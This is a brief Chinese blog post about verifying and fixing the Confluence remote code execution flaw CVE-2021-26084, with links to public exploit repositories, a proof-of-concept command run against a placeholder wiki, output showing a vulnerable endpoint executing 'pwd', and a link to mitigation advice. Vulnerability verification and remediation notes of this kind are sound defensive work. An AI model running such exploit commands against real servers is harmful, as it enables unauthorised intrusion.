• 0x0 风险问题
  • 0x1 防护措施
  • 首页
  • 归档

confluence漏洞CVE-2021-26084处理

  • yuc
  • 2022-02-15
  • 2022-07-22
  • 浏览:437
  • 0

0x0 风险问题

参考注入代码:
https://github.com/0xf4n9x/CVE-2021-26084
https://github.com/h3v0x/CVE-2021-26084_Confluence/

注入POC:

python3 POC.py -u "https://wiki.xxx.com" -e pwd

回显结果:

[+] https://wiki.xxx.com/pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
/home/wiki/confluence/bin

0x1 防护措施

http://blog.nsfocus.net/atlassian-confluence/

© 2023
Theme by Wing
  • {{ item.name }}
  • {{ item.name }}